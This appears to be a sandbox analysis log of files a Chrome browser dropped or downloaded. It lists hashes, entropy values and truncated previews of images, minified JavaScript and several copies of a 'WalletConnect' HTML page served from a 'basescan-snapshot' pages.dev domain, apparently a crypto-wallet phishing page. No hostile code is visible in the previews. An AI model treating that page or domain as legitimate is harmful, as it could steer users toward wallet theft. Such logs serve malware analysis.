                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............*..:....PLTE..r.................l..l..n..r...?JL?CC9BD>DD;DF=AB;BC:CD<BC:CD;AB<BC:BC<BD6=><CC<BD:AB;BC:AB:@A:AC<CD:AB;BB:AB;EE9@B:BD:AA;DE@DE:AB:AB:@A:CC:AB>BF=AC:AB9?A;CC;BC:AB>EF:AB9AB=BE;BC7?@=AD9AB9AA<CC:AB:@A:AB;BB:@B:AB:AB9@A39:4:;8?@:BC:AA:BC:AB7>@5<=..p>EE=BF..^..o..d..k..n_aS..radX@FF;BH..iwsZ..m..l..`..k.|^BFI..ofh\..n..i..q..p..q..r..p..g..r..r..m..q..q..f..i..qlm^..r..s..r~y\..m..d..j..q{vZ..o..f..b[`X......y...{\..r..pW[Q......:@B<BD:AB9@B:AB9?A:AB:BB8??7>?..k..o..p..g..s..`..otvk............|.......................................................e..o..djhS..b..iUWK..gWYM..j..f{vZ..^mjU..rqmV..m..`..l..iZ_UtpX..g..k.........s}.......jrt.........nxx...............tRNS..l.~..KF...................!#%')*+-./0123446789:;;<=>?AABCDDFFGHIJKMNORRORTUVXZYVWFBQ.u..8.3('yE..It:#...f....g>..o..VP.)...?.\..B.ma;~f[Z..Djlffdba_^\[\`..+.4y#.DTp;..1.O..eyt...Q_.t..Y|.O.H..bnT.O.g..?J|....C..Q...J...3i....n.IDATx..\].].U^k..I....@S..$B..T....scEA...@.E*
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2641)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2642
                                                                                                                                                                                                                                              Entropy (8bit):5.232557260519249
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:27Y067B+G2d3toT6mn6Z5TMYfKGAc3nYm2ezNRXzIQW5bHZzhKDD:UY0cEbdhMYfKO3n/jDIQsbPKf
                                                                                                                                                                                                                                              MD5:05348E9E31F6ACEB8F32357B932C656C
                                                                                                                                                                                                                                              SHA1:A293A6B70F095D4851B762AF92B2A3D5B06A03A6
                                                                                                                                                                                                                                              SHA-256:A7D5C5E10AFC43C1FEB2C4E3DFF7D12A656909FCC5EAAAD72396A9FD3EC65954
                                                                                                                                                                                                                                              SHA-512:F8E8E58668C5B444525FE4D9D0FAF6B9A2E78FE9FBF8ACC449DD43F91CB06450F97224C11AC0AA653CA7C27187A71801E2CC0CC530D3C777834AEAAD960E842B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var L=Object.defineProperty;var $=Object.getOwnPropertySymbols;var R=Object.prototype.hasOwnProperty,j=Object.prototype.propertyIsEnumerable;var w=(t,l,n)=>l in t?L(t,l,{enumerable:!0,configurable:!0,writable:!0,value:n}):t[l]=n,m=(t,l)=>{for(var n in l||(l={}))R.call(l,n)&&w(t,n,l[n]);if($)for(var n of $(l))j.call(l,n)&&w(t,n,l[n]);return t};import{j as d,b as k,i as h,c as a,e as A,s as M,m as q,t as u}from"./web-13cf6287.js";import{c as z,T as x,E as D}from"./manifest-51a3674f.js";import{i as G,m as J,c as K,F as i,g as N}from"./solid-js-38561dfe.js";var O=u("<thead>"),T=u("<tr>"),Q=u("<th>"),S=u("<tbody>"),v=u("<td>"),U=u("<table>");const Z=t=>{var b,y;const[l,n]=G(t,["columns","data","components","bordered"]),g=J({bordered:!0},l),c={header:m({wrapper:r=>(()=>{var e=O();return d(e,r,!1,!1),e})(),row:r=>(()=>{var e=T();return d(e,r,!1,!1),e})(),cell:r=>(()=>{var e=Q();return d(e,r,!1,!1),e})()},(b=g.components)==null?void 0:b.header),body:m({wrapper:r=>(()=>{var e=S();return d(e,r,!
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1453
                                                                                                                                                                                                                                              Entropy (8bit):6.193943332675493
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6LWkzum8COZNDsLlpGPUc6QlB3X+JGnlkrDsIXk3lql/iLuQLV6GmT:+ZYjwWklfll0xlB3X8GmrDD0VqS0
                                                                                                                                                                                                                                              MD5:9FDF5E1B164E17E56AA9A23E97998FAD
                                                                                                                                                                                                                                              SHA1:2242950E119C74709D382CD4F7566084A6830756
                                                                                                                                                                                                                                              SHA-256:690E170D42BB03245B6606F59D2E48E4BE77934A655851CBD2D6414706BD091B
                                                                                                                                                                                                                                              SHA-512:8537289579AEF5CD370CA082A488924DA9FB6716BBB8B1A6E439EF3701DDF9A871EE498FA9D8575CFE8D72FE675B43EB0202A19DA504E3B87A96CBAC27B52C73
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/a131ebc530.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3...z...(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma....................mdat........0@CA.2.......1..L...(..E....=.F..1.....H.....=.,.Q...d.o.IE...4cf...<..i7..<J)....{.*....Q^x/B....j^.......:\..D9..\*w?.r...:Z*dO(t.Xa.5^.....q[.K.....A5,...y....-
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (26248)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):26249
                                                                                                                                                                                                                                              Entropy (8bit):5.226789394394794
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:/Vuvc/99j9ZpoPNdZ2kDYehU5hto05TJ0XjOgvNnBGZxccQC4EhrR6:/IvG9J9mNDYezjhB2xb4K6
                                                                                                                                                                                                                                              MD5:9C2D29914D07D7C54A2BF3C6727CA68B
                                                                                                                                                                                                                                              SHA1:EA94274EAA95FAFE71947B30D61AFC1BAA9A4D78
                                                                                                                                                                                                                                              SHA-256:8B5E88927EFD4131C8CAE11321316AD4A07A0C9D70AEE36FC0344C38416C3A1C
                                                                                                                                                                                                                                              SHA-512:EFFD4EABE041240F7C47A65EA2F8E26EC201F03068D8239BF86B1310EDBEFCDAA298CEE19A128A577D2A47404A16C82C15355F81F88910930EDAEB05F285A5D5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var d=(s,l,r)=>new Promise((u,a)=>{var e=_=>{try{n(r.next(_))}catch(i){a(i)}},o=_=>{try{n(r.throw(_))}catch(i){a(i)}},n=_=>_.done?u(_.value):Promise.resolve(_.value).then(e,o);n((r=r.apply(s,l)).next())});const D="modulepreload",p=function(s){return"/modules/account2/"+s},m={},t=function(l,r,u){if(!r||r.length===0)return l();const a=document.getElementsByTagName("link");return Promise.all(r.map(e=>{if(e=p(e),e in m)return;m[e]=!0;const o=e.endsWith(".css"),n=o?'[rel="stylesheet"]':"";if(!!u)for(let c=a.length-1;c>=0;c--){const E=a[c];if(E.href===e&&(!o||E.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${e}"]${n}`))return;const i=document.createElement("link");if(i.rel=o?"stylesheet":D,o||(i.as="script",i.crossOrigin=""),i.href=e,document.head.appendChild(i),o)return new Promise((c,E)=>{i.addEventListener("load",c),i.addEventListener("error",()=>E(new Error(`Unable to preload CSS for ${e}`)))})})).then(()=>l()).catch(e=>{const o=new Event("vite:preloadError",{canc
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (737)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):738
                                                                                                                                                                                                                                              Entropy (8bit):5.081000323787001
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:nLvsSEcCEU5oNDFgGR/eFSSEw9h/UprmzKJeYgJPF8e/KvnY6xsy+y:nTstcCEUSFT/dDAJEYQgJXKvY62G
                                                                                                                                                                                                                                              MD5:E9F163447727FB5F8A4926068DD21D08
                                                                                                                                                                                                                                              SHA1:4A4876080A9D6CB5067B45ABF78E2B02DA8E3DF8
                                                                                                                                                                                                                                              SHA-256:B1D67573159A94DE327B731D6A3FC8457FF19F1997A8B543D8C372CBA1D1EFAA
                                                                                                                                                                                                                                              SHA-512:C7B6747EB37A4A138A383B37CA0780F50F0C13634CC97D409C15B392DBE4529185E5BFBEC41A0B15BDF83854BFEB4E122E8997AC3318B206F417AA02B9F7E9A7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var l=typeof global=="object"&&global&&global.Object===Object&&global;const f=l;var g=typeof self=="object"&&self&&self.Object===Object&&self,s=f||g||Function("return this")();const j=s;var y=j.Symbol;const o=y;var a=Object.prototype,S=a.hasOwnProperty,d=a.toString,e=o?o.toStringTag:void 0;function u(t){var r=S.call(t,e),c=t[e];try{t[e]=void 0;var i=!0}catch(m){}var b=d.call(t);return i&&(r?t[e]=c:delete t[e]),b}var O=Object.prototype,T=O.toString;function p(t){return T.call(t)}var v="[object Null]",$="[object Undefined]",n=o?o.toStringTag:void 0;function h(t){return t==null?t===void 0?$:v:n&&n in Object(t)?u(t):p(t)}function w(t){var r=typeof t;return t!=null&&(r=="object"||r=="function")}export{o as S,h as b,f,w as i,j as r};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (780)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):781
                                                                                                                                                                                                                                              Entropy (8bit):5.187512677704716
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:UqvL0mDZcxMceG3LClbXsxwAXslw3Xs4lBXsiXO8Xs1q2eGuzZxScFGu3BDI0PHJ:900OeG3+axGfIqpRM2eJZxS2MUH87mJ1
                                                                                                                                                                                                                                              MD5:8789FF45B25DC550B300291CA63A44F4
                                                                                                                                                                                                                                              SHA1:ADABB5FAB84AE75BC4DD89E915097940A9C04B48
                                                                                                                                                                                                                                              SHA-256:76A6AD0A5A25E77AF10DB56BAC02026B397D31FBB88147AA0E8C91E0F28B160C
                                                                                                                                                                                                                                              SHA-512:0F0F07A2329B1B4D0B616D1F7B316BD595925BD66841D873F108807A8E7ED8B158D2149C99FE7578C4D27F6A88398E4BAF045055A47EFB5B3E674EABC9D473D2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/index-1cecafc8.js
                                                                                                                                                                                                                                              Preview:import{e as g}from"./manifest-aca455c4.js";function d(e){return e?e>9?e:"0"+e:"00"}function u(e,t=""){return t=t&&t+".",`${window.location.protocol}//${t}${g.host}${e}`}function f(e){return u(`#/gift_ticket/${e}`)}function p(e){const t=new Date(e),n=t.getFullYear(),r=String(t.getMonth()+1).padStart(2,"0"),o=String(t.getDate()).padStart(2,"0"),c=String(t.getHours()).padStart(2,"0"),a=String(t.getMinutes()).padStart(2,"0"),i=String(t.getSeconds()).padStart(2,"0"),s=t.getHours()>=12?"PM":"AM";return`${r}/${o}/${n}, ${c}:${a}:${i} ${s}`}function m(e,t){const n=e||"USD";return t?`/coin/${n}.rect.png`:`/coin/${n}.black.png`}function l(e,t){return Object.fromEntries(Object.entries(e).filter(([n,r])=>t?!!r&&!t.includes(n):!!r))}export{m as a,u as b,d as c,f as d,l as r,p as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1568)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1569
                                                                                                                                                                                                                                              Entropy (8bit):5.397424329508399
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:JxVqG3TNI64Y7ZOLZF+XaH1/b0j30jqxk0jC9H5FkfZgoRgtRr69lGJBdmN3EJ:JvrNI6R7ZnFjEjIjgo+tR2rGJ83EJ
                                                                                                                                                                                                                                              MD5:57CE9F5699885104E40632039E8CD50B
                                                                                                                                                                                                                                              SHA1:DCCB76B5E1414E3AA2E808A1151A2C2DABC48C9D
                                                                                                                                                                                                                                              SHA-256:011B0379C271F29FF0EEFC3FB7AAA82A0E15EE878548DB11E7647D63098DE5C3
                                                                                                                                                                                                                                              SHA-512:C9F4EB02D6121370EA2790B1330361CB8D9A1FBAF296E7CEB9E64EAD7A29AB2364E6303B42197B35ADF51BEE6301FEA7B9EC95FCDF93B8210E678DE6B3FA807E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var f=Object.defineProperty,Y=Object.defineProperties;var M=Object.getOwnPropertyDescriptors;var i=Object.getOwnPropertySymbols;var h=Object.prototype.hasOwnProperty,p=Object.prototype.propertyIsEnumerable;var c=(e,t,r)=>t in e?f(e,t,{enumerable:!0,configurable:!0,writable:!0,value:r}):e[t]=r,a=(e,t)=>{for(var r in t||(t={}))h.call(t,r)&&c(e,r,t[r]);if(i)for(var r of i(t))p.call(t,r)&&c(e,r,t[r]);return e},g=(e,t)=>Y(e,M(t));import{e as T,D as s}from"./manifest-51a3674f.js";const b=()=>T.serverTime.getTime();function v(e){const t=new Date(e),r=o=>o<10?`0${o}`:o,n=r(t.getDate()),u=r(t.getMonth()+1),l=t.getFullYear(),m=r(t.getHours()),D=r(t.getMinutes());return`${u}/${n}/${l} ${m}:${D}`}function w(e){return e.toString().replace(/\B(?=(\d{3})+(?!\d))/g,",")}function $(e){return Array.from(g(a({},e),{length:Object.keys(e).length}))}function d(e,t){const r=Number(e||"0");return r>=1e10?new s(e).div(1e9).toFixed(t,s.ROUND_DOWN)+"B":r>=1e7?new s(e).div(1e6).toFixed(t,s.ROUND_DOWN)+"M":r>=1e3?
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):514
                                                                                                                                                                                                                                              Entropy (8bit):7.43672299628363
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:/1F63H/FWCSHaO7kw9dxgNXLSP/+0RzZ7nlfbRN9iCCROu:f0H/QaOBdqgP/+0Rlnlj5iCCROu
                                                                                                                                                                                                                                              MD5:015DE5452C578907BFCB141F9805BB5B
                                                                                                                                                                                                                                              SHA1:2F941A1E0F43730D05F727A041FE2161590702B6
                                                                                                                                                                                                                                              SHA-256:5680860AE5BD93D3443CDF7707221BAD09BAE1FC67D87DF84F07E377992B78E8
                                                                                                                                                                                                                                              SHA-512:B237441DC3438D5FBCEA4712340C2408BB01FCFA11BC0A2CCAD6A0AF59B0DB63A922463672971CE4BE161B7F62AD898B917BDB7942ACBBEED8FA14DE7D99C606
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/mastercard-CVVg_XRh.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../:..... .$'.9... ..`.I..Z..rN..s.Q.I..6#8. .9.A$[A..F....`CM.......I.A.`R.6\...I.D...`5.j..Q.L..;.....V.r+..c.4..Uu(L[l..I.dA....;....`_.f.....2<&.c.....{.0.dUY..o....Z..{{....?.......{|.....O.c.P$...\v..|:]...;K)..*Z.*<v.V..CE)..9...Q...\.R...R..6I.8....t..8.-.F.-..$IoX...b........P..t-U....`W..5&m......m..)z.N.3jl..H..EA]^}fH.^,[...:NQ.......?x.../+.4.I..C.....W.....u..\.g;..Y..z_^?.5v.|U..O'y.}......UY...p....ZW..\...p.3F...(c%<........B$[.......R5...J..s3..#..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1368
                                                                                                                                                                                                                                              Entropy (8bit):6.029600492254179
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6LDkzum8COZNDsLlpGPUc6QlQn4I3NjOSQOU/zPla1:+ZYjwDklfll0xlenNjOOU/c1
                                                                                                                                                                                                                                              MD5:23D9B4248354FEA5EEEA59312483F9B0
                                                                                                                                                                                                                                              SHA1:A340732B3AFF58E200419435D68E1E06FAF26F13
                                                                                                                                                                                                                                              SHA-256:6D569CA105BDD060D73E7803575921118B07AB44EA0897D4464CBBE1476AD844
                                                                                                                                                                                                                                              SHA-512:8E9C610634292B7898BD9007BE937C6AE3CCFCC531A5658202471FB248A5001284815AD6D5F002F3272E852E0906503EDA2C6A7C906ABF76B85C524BC0B868DD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/d927716dbf.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3...%...(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma...................-mdat........0@CA.2.......1..C.<.e............i8f....0.7}Q]..H[....Yk.[.a..'..8....+yC..x.R.'<,.{ m...r.4..7L1...Rp5uc.2G._..O.,..Wc|.....CQXZ.yV..W.......o0....T..V^.h.....$Z
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65248), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):81766
                                                                                                                                                                                                                                              Entropy (8bit):5.150917357797794
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:RLyGsuTxEudQc8fn3U/vCWHypWDWSCcFgj7COtOMG6JPkl+AIdbbhj1OkFhjrPu0:RLPXmfn37vpClHqrPupWEWQfGJ
                                                                                                                                                                                                                                              MD5:27BE120D954F482B0A30F7B11F1F6CFF
                                                                                                                                                                                                                                              SHA1:D45B0E27A308899C9151DCF03F7FF94721126E43
                                                                                                                                                                                                                                              SHA-256:6948CB29F8878AD5C975E668248AF6058815899264BDFBEC14731BD4AB401B87
                                                                                                                                                                                                                                              SHA-512:26B73A474A342097BB4741EE8279E464ABFF343F390EF308D8DD7BFAE1A29DEF04EE6C16B62AAC950915EE900C9DAE8A0CCF20F74775E611FA43EB0A09BD1131
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/*..* Cube Portfolio - Responsive jQuery Grid Plugin..*..* version: 4.4.0 (1 August, 2018)..* require: jQuery v1.8+..*..* Copyright 2013-2018, Mihai Buricea (http://scriptpie.com/cubeportfolio/live-preview/)..* Licensed under CodeCanyon License (http://codecanyon.net/licenses)..*..*/....!function(s,t,a,r){"use strict";function l(t,e,n){var i=this;if(s.data(t,"cubeportfolio"))throw new Error("cubeportfolio is already initialized. Destroy it before initialize again!");i.obj=t,i.$obj=s(t),s.data(i.obj,"cubeportfolio",i),e&&e.sortToPreventGaps!==r&&(e.sortByDimension=e.sortToPreventGaps,delete e.sortToPreventGaps),i.options=s.extend({},s.fn.cubeportfolio.options,e,i.$obj.data("cbp-options")),i.isAnimating=!0,i.defaultFilter=i.options.defaultFilter,i.registeredEvents=[],i.queue=[],i.addedWrapp=!1,s.isFunction(n)&&i.registerEvent("initFinish",n,!0);var o=i.$obj.children();i.$obj.addClass("cbp"),(0===o.length||o.first().hasClass("cbp-item"))&&(i.wrapInner(i.obj,"cbp-wrapper"),i.addedWrapp=!0)
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
